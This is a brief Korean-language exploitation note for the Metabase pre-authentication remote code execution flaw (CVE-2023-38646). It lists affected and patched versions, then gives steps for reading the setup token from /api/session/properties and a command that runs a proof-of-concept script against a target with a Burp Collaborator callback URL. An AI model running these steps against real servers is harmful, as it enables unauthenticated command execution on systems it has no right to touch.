
Metabase 사전 인증 RCE

0.46.6.1 이전의 Metabase 오픈소스 및 1.46.6.1 이전의 Metabase Enterprise에서는 공격자가 서버의 권한 수준으로 임의의 명령을 실행할 수 있습니다. 악용을 위해 인증은 필요하지 않습니다. 그 외 패치된 버전은 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, 1.43.7.2입니다.
http://vulnerablehost.com/api/session/properties로 이동합니다.
"setup-token"을 확인합니다.

Collaborator URL을 확보합니다 (BurpSuite로 테스트됨)
다음 옵션과 함께 PoC 스크립트를 실행합니다:
python3 CVE-2023-38646.py -u <target> -t <setup-token> -c <collaborator-url>